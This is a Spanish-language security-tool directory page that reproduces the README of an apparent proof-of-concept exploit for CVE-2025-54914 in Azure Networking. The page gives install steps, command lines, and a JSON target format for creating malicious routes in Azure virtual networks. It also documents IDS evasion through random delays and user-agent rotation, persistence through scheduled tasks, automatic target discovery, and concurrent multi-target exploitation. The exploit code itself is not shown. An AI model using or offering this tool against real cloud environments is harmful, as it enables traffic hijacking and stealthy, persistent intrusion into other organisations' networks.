Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-54914-PoC — Exploit para CVE-2025-54914 en Azure Networking, que crea rutas maliciosas con evasión, persistencia, escaneo multiobjetivo e informes para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/ash1996x/cve-2025-54914-poc
ReconocimientoMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSPruebas de PenetraciónSeguridad en la Nube
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Exploit para CVE-2025-54914 en Azure Networking, que crea rutas maliciosas con evasión, persistencia, escaneo multiobjetivo e informes para pruebas de seguridad autorizadas.

Ver Repositorio
4431hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54914 Azure Route Exploit

Resumen

Esta es una implementación mejorada de la vulnerabilidad CVE-2025-54914 de enrutamiento de Azure Networking. Esta versión mantiene la funcionalidad principal de la CVE mientras añade más características como persistencia, evasión, escaneo multiobjetivo y manejo de errores.

Características

Funcionalidad Principal de la CVE

  • Creación de rutas: Crea rutas maliciosas en redes virtuales de Azure
  • Eliminación de rutas: Elimina las rutas creadas para limpieza
  • Compatibilidad con API: Funciona con Azure Management API 2025-09-01
  • Autenticación: Soporta autenticación mediante Azure CLI y token manual

Características Adicionales

  • Técnicas de evasión: Retrasos aleatorios, rotación de user agent, ofuscación de solicitudes
  • Persistencia: Creación de tareas programadas, modo de monitoreo continuo
  • Escaneo multiobjetivo: Escaneo y explotación concurrente de múltiples objetivos
  • Informes completos: Informes detallados con análisis de éxito/fracaso
  • Manejo de errores: Manejo elegante de fallos y recuperación
  • Gestión de configuración: Configuración de objetivos basada en JSON
  • Descubrimiento de objetivos: Descubrimiento automático de recursos vulnerables
  • Evaluación de riesgos: Análisis de vulnerabilidades y puntuación de riesgo

Instalación

Prerrequisitos

# Instalar dependencias de Python
pip install requests

# Instalar Azure CLI (para autenticación)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Configuración

# Hacer ejecutables los scripts
chmod +x exploit.py
chmod +x exploit_utils.py

# Autenticarse con Azure
az login

Uso

Uso básico

Explotación de un solo objetivo

# Crear ruta en un solo objetivo
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Eliminar ruta
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Explotación multiobjetivo

# Crear archivo de configuración
python exploit_utils.py discover --output targets.json

# Explotar todos los objetivos
python exploit.py --targets-file targets.json --operation create

Modo de escaneo

# Escanear objetivos sin explotar
python exploit.py --targets-file targets.json --scan-only

Modo de persistencia

# Habilitar persistencia con intervalos de 30 minutos
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Uso avanzado

Evasión y sigilo

# Rangos de retardo personalizados para evasión
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Modo de simulación (dry run)

# Probar sin explotación real
python exploit.py --targets-file targets.json --dry-run

Registro detallado

# Habilitar registro de depuración
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Configuración

Formato de configuración de objetivos

{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Configuración de objetivos para CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Variables de entorno

# Token de acceso de Azure (alternativa a Azure CLI)
export AZURE_ACCESS_TOKEN="su_token_aqui"

# Nivel de registro
export LOG_LEVEL="INFO"

Scripts de utilidades

Descubrimiento de objetivos

# Descubrir todos los objetivos accesibles
python exploit_utils.py discover --output discovered_targets.json

# Descubrir suscripciones específicas
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Generación de configuración

# Generar configuración de explotación a partir de objetivos descubiertos
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Análisis de vulnerabilidades

# Analizar objetivos para evaluación de riesgos
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Características de seguridad

Técnicas de evasión

  • Temporización de solicitudes: Retrasos aleatorios entre solicitudes
  • Rotación de User Agent: Múltiples user agents de navegador
  • Ofuscación de cabeceras: Cabeceras HTTP realistas
  • Verificación SSL: Validación adecuada de certificados

Mecanismos de persistencia

  • Tareas programadas: Creación de tareas programadas en Windows
  • Modo continuo: Persistencia de larga duración
  • Gestión de sesiones: Preservación del estado entre ejecuciones
  • Persistencia de configuración: Ajustes guardados en disco

Manejo de errores

  • Degradación gradual: Continúa ante fallos individuales
  • Protección de tiempo de espera: Evita solicitudes que se cuelgan
  • Manejo de señales: Apagado limpio al interrumpir
  • Limpieza de recursos: Limpieza automática al salir

Informes

Informes de explotación

  • Resultados de la operación: Éxito/fracaso para cada objetivo
  • Información de tiempo: Marcas de tiempo de ejecución
  • Detalles de error: Mensajes de error detallados
  • Estadísticas resumidas: Tasas de éxito globales

Informes de descubrimiento

  • Inventario de objetivos: Lista completa de recursos descubiertos
  • Desglose por suscripción: Objetivos agrupados por suscripción
  • Detalles de recursos: Información de VNet, subred y ubicación

Análisis de vulnerabilidades

  • Evaluación de riesgos: Categorización de riesgo alto/medio/bajo
  • Indicadores de producción: Identificación de entornos de producción
  • Análisis de etiquetas: Puntuación de riesgo basada en etiquetas de recursos

Buenas prácticas

Seguridad operativa

  1. Usar modo de simulación: Siempre probar con --dry-run primero
  2. Limitar el alcance: Comenzar con entornos que no sean de producción
  3. Monitorizar registros: Revisar los registros para comportamientos inesperados
  4. Limpiar: Eliminar las rutas creadas después de las pruebas

Optimización del rendimiento

  1. Límites de trabajadores: Ajustar --max-workers según la capacidad del sistema
  2. Ajuste de retardos: Equilibrar sigilo vs. velocidad con la configuración de retardos
  3. Procesamiento por lotes: Usar archivos de objetivos para operaciones a gran escala
  4. Monitorización de recursos: Supervisar los recursos del sistema durante la ejecución

Recuperación de errores

  1. Revisar registros: Consultar los mensajes de error para solucionar problemas
  2. Verificar permisos: Asegurar los permisos adecuados de Azure
  3. Conectividad de red: Verificar la conectividad a Internet
  4. Validez del token: Verificar el estado de autenticación de Azure CLI

Solución de problemas

Problemas comunes

Errores de autenticación

# Reautenticarse con Azure
az login

# Verificar cuenta actual
az account show

# Listar suscripciones accesibles
az account list
Descargar herramienta